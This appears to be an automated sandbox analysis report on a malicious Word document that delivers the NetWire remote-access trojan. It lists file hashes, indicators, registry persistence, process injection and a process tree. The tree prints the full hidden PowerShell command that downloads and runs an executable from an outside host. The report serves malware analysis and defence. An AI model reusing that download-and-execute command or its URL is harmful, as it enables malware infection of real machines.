Analysis
max time kernel: 139s
max time network: 146s
platform: windows10_x64
resource: win10v20201028
submitted: 13-01-2021 09:17

Static task: static1
Behavioral task: behavioral1 (Sample: Pokana2021011357.doc, Resource: win7v20201028)
Behavioral task: behavioral2 (Sample: Pokana2021011357.doc, Resource: win10v20201028)
General
Target: Pokana2021011357.doc
Size: 55KB
MD5: 9a59fc2435737333486d786264c40542
SHA1: 19ccdcf1cdafdd248080f7a0b4a481057125ebdf
SHA256: ca7d0cd170dc326645352637b21087e96576f33aafebcb59cb3ea28952d7214d
SHA512: eddb242b35355a91000d124a13bce5df1a929282f9ebf4554c261b14a1c473e75bf3c0d657f521b78d07e687ce26a749713a5aa9ffc908a53106b94744c69be5
Malware Config
Extracted URL: http://one.oziriss.club:2095/ol/o1.exe
Signatures

NetWire RAT payload (6 IoCs)
Processes (resource, yara_rule):
- behavioral2/memory/1116-10-0x0000000000E40000-0x0000000000E70000-memory.dmp, netwire
- behavioral2/memory/1116-11-0x0000000000E4242D-mapping.dmp, netwire
- behavioral2/memory/1116-13-0x0000000000E40000-0x0000000000E70000-memory.dmp, netwire
- behavioral2/memory/1232-18-0x00000000013C0000-0x00000000013F0000-memory.dmp, netwire
- behavioral2/memory/1232-19-0x00000000013C242D-mapping.dmp, netwire
- behavioral2/memory/1232-21-0x00000000013C0000-0x00000000013F0000-memory.dmp, netwire
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description, pid, pid_target, process, target process):
- Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process; pid 2008 (powershell.exe), target pid 576 (WINWORD.EXE)
Blocklisted process makes network request (1 IoC)
Processes (flow, pid, process):
- flow 22, pid 2008, powershell.exe
Executes dropped EXE (4 IoCs)
Processes (pid, process):
- 2916 secure.exe
- 1116 secure.exe
- 3292 fers.exe
- 1232 fers.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes (description, ioc, process):
- Key created: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ (fers.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\fers = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\fers.exe" (fers.exe)
Suspicious use of SetThreadContext (2 IoCs)
Processes (description, pid, process, target process):
- PID 2916 set thread context of 1116; secure.exe -> secure.exe
- PID 3292 set thread context of 1232; fers.exe -> fers.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (WINWORD.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (WINWORD.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (WINWORD.EXE)
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description, ioc, process):
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (WINWORD.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (WINWORD.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (WINWORD.EXE)
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes (pid, process):
- 576 WINWORD.EXE (2 occurrences)
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes (pid, process):
- 2008 powershell.exe (3 occurrences)
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes (description, pid, process):
- Token: SeDebugPrivilege; pid 2008, powershell.exe
Suspicious use of SetWindowsHookEx (18 IoCs)
Processes (pid, process):
- 576 WINWORD.EXE (18 occurrences)
Suspicious use of WriteProcessMemory (18 IoCs)
Processes (description, pid, process, target process):
- PID 576 wrote to memory of 2008; WINWORD.EXE -> powershell.exe (2 occurrences)
- PID 2008 wrote to memory of 2916; powershell.exe -> secure.exe (3 occurrences)
- PID 2916 wrote to memory of 1116; secure.exe -> secure.exe (5 occurrences)
- PID 1116 wrote to memory of 3292; secure.exe -> fers.exe (3 occurrences)
- PID 3292 wrote to memory of 1232; fers.exe -> fers.exe (5 occurrences)
Processes
Process tree (numbers give the depth; each entry is a child of the one above it):

1. C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
   Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Pokana2021011357.doc" /o ""
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://one.oziriss.club:2095/ol/o1.exe',$env:Temp+'\secure.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\secure.exe')
   - Process spawned unexpected child process
   - Blocklisted process makes network request
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory

3. C:\Users\Admin\AppData\Local\Temp\secure.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\secure.exe"
   - Executes dropped EXE
   - Suspicious use of SetThreadContext
   - Suspicious use of WriteProcessMemory

4. C:\Users\Admin\AppData\Local\Temp\secure.exe
   Command line: C:\Users\Admin\AppData\Local\Temp\secure.exe
   - Executes dropped EXE
   - Suspicious use of WriteProcessMemory

5. C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
   Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe"
   - Executes dropped EXE
   - Suspicious use of SetThreadContext
   - Suspicious use of WriteProcessMemory

6. C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
   Command line: C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
   - Executes dropped EXE
   - Adds Run key to start application
Downloads
- C:\Users\Admin\AppData\Local\Temp\secure.exe
  MD5: b61d866837ca60df01c1465e028db4c9
  SHA1: 53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
  SHA256: b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
  SHA512: f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
- C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe (same hashes as secure.exe)
  MD5: b61d866837ca60df01c1465e028db4c9
  SHA1: 53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
  SHA256: b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
  SHA512: f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
- C:\Users\Admin\AppData\Roaming\trftkoxoicklgdxkctuphueti84738.png (these are the hashes of an empty, zero-byte file)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
Memory dumps (resource, filesize):
- memory/576-2-0x00007FFC303D0000-0x00007FFC30A07000-memory.dmp, 6.2MB
- memory/1116-10-0x0000000000E40000-0x0000000000E70000-memory.dmp, 192KB
- memory/1116-11-0x0000000000E4242D-mapping.dmp
- memory/1116-13-0x0000000000E40000-0x0000000000E70000-memory.dmp, 192KB
- memory/1232-21-0x00000000013C0000-0x00000000013F0000-memory.dmp, 192KB
- memory/1232-19-0x00000000013C242D-mapping.dmp
- memory/1232-18-0x00000000013C0000-0x00000000013F0000-memory.dmp, 192KB
- memory/2008-6-0x000002CA79FE0000-0x000002CA79FE1000-memory.dmp, 4KB
- memory/2008-4-0x00007FFC29BE0000-0x00007FFC2A5CC000-memory.dmp, 9.9MB
- memory/2008-5-0x000002CA79C30000-0x000002CA79C31000-memory.dmp, 4KB
- memory/2008-3-0x0000000000000000-mapping.dmp
- memory/2916-7-0x0000000000000000-mapping.dmp
- memory/3292-14-0x0000000000000000-mapping.dmp